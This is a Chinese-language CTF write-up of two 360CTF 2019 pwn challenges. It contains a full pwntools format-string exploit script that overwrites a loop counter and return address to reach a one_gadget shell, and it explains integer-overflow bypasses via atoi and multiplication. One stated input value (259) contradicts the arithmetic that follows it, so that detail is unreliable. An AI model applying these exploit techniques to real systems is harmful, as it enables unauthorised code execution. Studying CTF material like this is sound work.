emmm忘记题目名称了,一共两个题就以Pwn1、Pwn2来记录
我觉得题目质量还是很好的,解题过程中学到了不少东西
Pwn1
保护全开
ssta@E4x:/media/psf/pwn/3ctf$ checksec 7631454338ff70b1a6b1262f5f36beac
[*] '/media/psf/pwn/3ctf/7631454338ff70b1a6b1262f5f36beac'
Arch: i386-32-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
在IDA中打开,程序的流程很简单 没有多余的函数,其中N在data段值为3,也就是说我们最多只有三次利用的机会
int __cdecl main(int argc, const char **argv, const char **envp)
{
int i; // [esp+Ch] [ebp-14h]
char buf; // [esp+10h] [ebp-10h]
unsigned int v6; // [esp+14h] [ebp-Ch]
int *v7; // [esp+18h] [ebp-8h]
v7 = &argc;
v6 = __readgsdword(0x14u);
setbuf(stdout, 0);
setbuf(stdin, 0);
puts("welcome to 360CTF_2019");
for ( i = 0; i < N; ++i )
{
puts("1. Input");
puts("2. Exit");
read(0, &buf, 4u);
if ( atoi(&buf) != 1 )
{
if ( atoi(&buf) != 2 )
return 0;
break;
}
puts("It's time to input something");
read(0, &buff, 0x10u);
printf((const char *)&buff);
}
puts("Good luck to you!");
return 0;
}
因为开了Full RELRO,所以不能写GOT表,一开始没有注意到格式化字符没有在栈中而是在bss段。对于格式化字符不在栈中的利用手法,我们可以在栈中找一条攻击链,然后利用偏移来修改指针,具体可参考http://blog.eonew.cn/archives/1196#more-1196。还有一个问题就是,格式化字符并不能一次性写入一个很大的值,要多次利用,而我们只有三次机会!所以在这里需要修改一下变量i或者N的值,这里我选择修改i的值,将i的最高地址写成0xff,这样i就变成了很大的负数,理论上我们可以无限次利用了!
利用思路(前三次):
- 利用格式化字符leak出libc、stack地址
- 修改攻击链指向i的地址
- 修改i的值为负数
这时已经可以无限次利用了,我们只需要修改跳板指针指向栈中的main函数返回地址,然后将返回地址修改成one_gadget地址或者system(需要布置下栈,再写一个/bin/sh字符串地址作为参数传进去)
exp:
#!/usr/bin/python
from pwn import *
# context.log_level='debug'
p = process('7631454338ff70b1a6b1262f5f36beac')
libc = ELF('/lib/i386-linux-gnu/libc.so.6',checksec=False)
elf = ELF('./7631454338ff70b1a6b1262f5f36beac',checksec=False)
p.recvuntil('2. Exit\n')
p.sendline('1')
p.recvuntil("It's time to input something\n")
p.sendline(r'%15$p.%p.%6$p.')
libc_base = int(p.recvuntil('.',drop=True),16)-(0xf7e1b637-0xf7e03000)
log.success('libc_base: %s' % hex(libc_base))
system_addr = libc_base + libc.symbols['system']
log.success('system addr: %s' % hex(system_addr))
elf_base = int(p.recvuntil('.',drop=True),16)-(0x56557010-0x56555000)
log.success('elf_base: %s' % hex(elf_base))
atoi_addr = elf_base + elf.got['atoi']
one_gadget = libc_base + 0x3ac5e
log.success('one gadget: %s' % hex(one_gadget))
i_addr = int(p.recvuntil('.',drop=True),16)-0xc0
log.success('i addr: %s' % hex(i_addr) )
p.recvuntil('2. Exit\n')
p.sendline('1')
p.recvuntil("It's time to input something\n")
one_byte = (i_addr & 0xffff)
payload = '%' + str(one_byte+3) + 'd%6$hn'
# gdb.attach(p)
p.sendline(payload)
p.recvuntil('2. Exit\n')
p.sendline('1')
p.recvuntil("It's time to input something\n")
payload = '%255d%57$hn'
# gdb.attach(p)
p.sendline(payload)
ret_addr = i_addr+40
log.success('ret addr: %s' % hex(ret_addr))
p.recvuntil('2. Exit\n')
p.sendline('1')
p.recvuntil("It's time to input something\n")
one_byte = (ret_addr & 0xffff)
payload = '%' + str(one_byte) + 'd%6$hn'
# gdb.attach(p)
p.sendline(payload)
tmp = str(hex(one_gadget))
tmp1 = tmp[-2:]
tmp2 = tmp[-4:-2]
tmp3 = tmp[-6:-4]
# print 'tmp1:',tmp1,'tmp2:',tmp2,'tmp3:',tmp3
p.recvuntil('2. Exit\n')
p.sendline('1')
p.recvuntil("It's time to input something\n")
payload = '%'+str(int(tmp1,16))+'c%57$hhn'
# gdb.attach(p)
p.sendline(payload)
p.recvuntil('2. Exit\n')
p.sendline('1')
# gdb.attach(p)
p.recvuntil("It's time to input something\n")
one_byte = (ret_addr & 0xffff)
payload = '%' + str(one_byte+1) + 'd%6$hn'
p.sendline(payload)
p.recvuntil('2. Exit\n')
p.sendline('1')
p.recvuntil("It's time to input something\n")
payload = '%'+str(int(tmp2,16))+'c%57$hhn'
# gdb.attach(p)
p.sendline(payload)
p.recvuntil('2. Exit\n')
p.sendline('1')
p.recvuntil("It's time to input something\n")
one_byte = (ret_addr & 0xffff)
payload = '%' + str(one_byte+2) + 'd%6$hn'
p.sendline(payload)
p.recvuntil('2. Exit\n')
p.sendline('1')
p.recvuntil("It's time to input something\n")
payload = '%'+str(int(tmp3,16))+'c%57$hhn'
# gdb.attach(p)
p.sendline(payload)
p.recvuntil('2. Exit\n')
p.sendline('2')
"""
0x3ac5c execve("/bin/sh", esp+0x28, environ)
constraints:
esi is the GOT address of libc
[esp+0x28] == NULL
0x3ac5e execve("/bin/sh", esp+0x2c, environ)
constraints:
esi is the GOT address of libc
[esp+0x2c] == NULL
0x3ac62 execve("/bin/sh", esp+0x30, environ)
constraints:
esi is the GOT address of libc
[esp+0x30] == NULL
0x3ac69 execve("/bin/sh", esp+0x34, environ)
constraints:
esi is the GOT address of libc
[esp+0x34] == NULL
0x5fbc5 execl("/bin/sh", eax)
constraints:
esi is the GOT address of libc
eax == NULL
0x5fbc6 execl("/bin/sh", [esp])
constraints:
esi is the GOT address of libc
[esp] == NULL
"""
p.interactive()
参考了这位师傅的文章
http://www.peckerwood.top/post/babyformat/
Pwn2
考察整数溢出,只有两个函数bypass1和bypass2。只要绕过了这两个函数就会输出flag。bypass1源码⬇️
signed __int64 bypass1()
{
int v1; // [rsp+8h] [rbp-38h]
int v2; // [rsp+Ch] [rbp-34h]
char buf; // [rsp+10h] [rbp-30h]
char s; // [rsp+20h] [rbp-20h]
unsigned __int64 v6; // [rsp+38h] [rbp-8h]
v6 = __readfsqword(0x28u);
memset(&s, 0, 0x10uLL);
puts("x: ");
read(0, &s, 0x10uLL);
puts("y: ");
read(0, &buf, 0x10uLL);
if ( strchr(&s, 45) || strchr(&buf, 45) ) // 检验负号
return 0LL;
v1 = atoi(&s);
v2 = atoi(&buf);
if ( v1 > 359 || v2 > 359 || v1 - v2 != 360 )
return 0LL;
puts("level1 success!");
return 1LL;
}
可以看到,程序要求输入两个数x和y,限制了不能带负号且任意一个值不能大于359,且两者的差要等于360!
因为程序对用户的输入通过atoi函数处理,这时如果输入一个很大数字就会发生溢出。如⬇️所示,0xffffffff经过atoi函数处理之后就会溢出成-1,我们只需要另x=259,y=4294967295来绕过他的check,两个数都不大于359,且359-(-1)=360条件成立。
ss@E4x:/media/psf/pwn/3ctf$ cat test.c
#include
#include
int main()
{
printf("%d\n",atoi("4294967295"));
return 0;
}
ss@E4x:/media/psf/pwn/3ctf$ gcc test.c && ./a.out
-1
bypass2函数⬇️
_BOOL8 bypass2()
{
int v1; // [rsp+0h] [rbp-10h]
int v2; // [rsp+4h] [rbp-Ch]
unsigned __int64 v3; // [rsp+8h] [rbp-8h]
v3 = __readfsqword(0x28u);
v1 = 0;
v2 = 0;
puts("Please input x and y:");
__isoc99_scanf("%d %d", &v1, &v2);
return v1 > 1 && v2 > 360 && v1 * v2 == 360;
}
同样要求输入两个值,限制了x>1,y>360并且他们的乘积要等于360。很明显需要利用乘法溢出来绕过check,首先我们要输入满足前两个条件的整数,并且不能发生溢出,因为一旦溢出就不满足其中的一个条件 这里我选择的两个数是4和1073741914,这两个数都是正常的整数,并且他们两个乘积发生溢出后刚好是360
ss@E4x:/media/psf/pwn/3ctf$ cat test.c
#include
#include
int main()
{
int a=4,b=1073741914;
printf("%d\n",a*b);
return 0;
}
ss@E4x:/media/psf/pwn/3ctf$ gcc test.c && ./a.out
360
至于两个数怎么来的hhhhh
In [3]: (4294967295+361)/4
Out[3]: 1073741914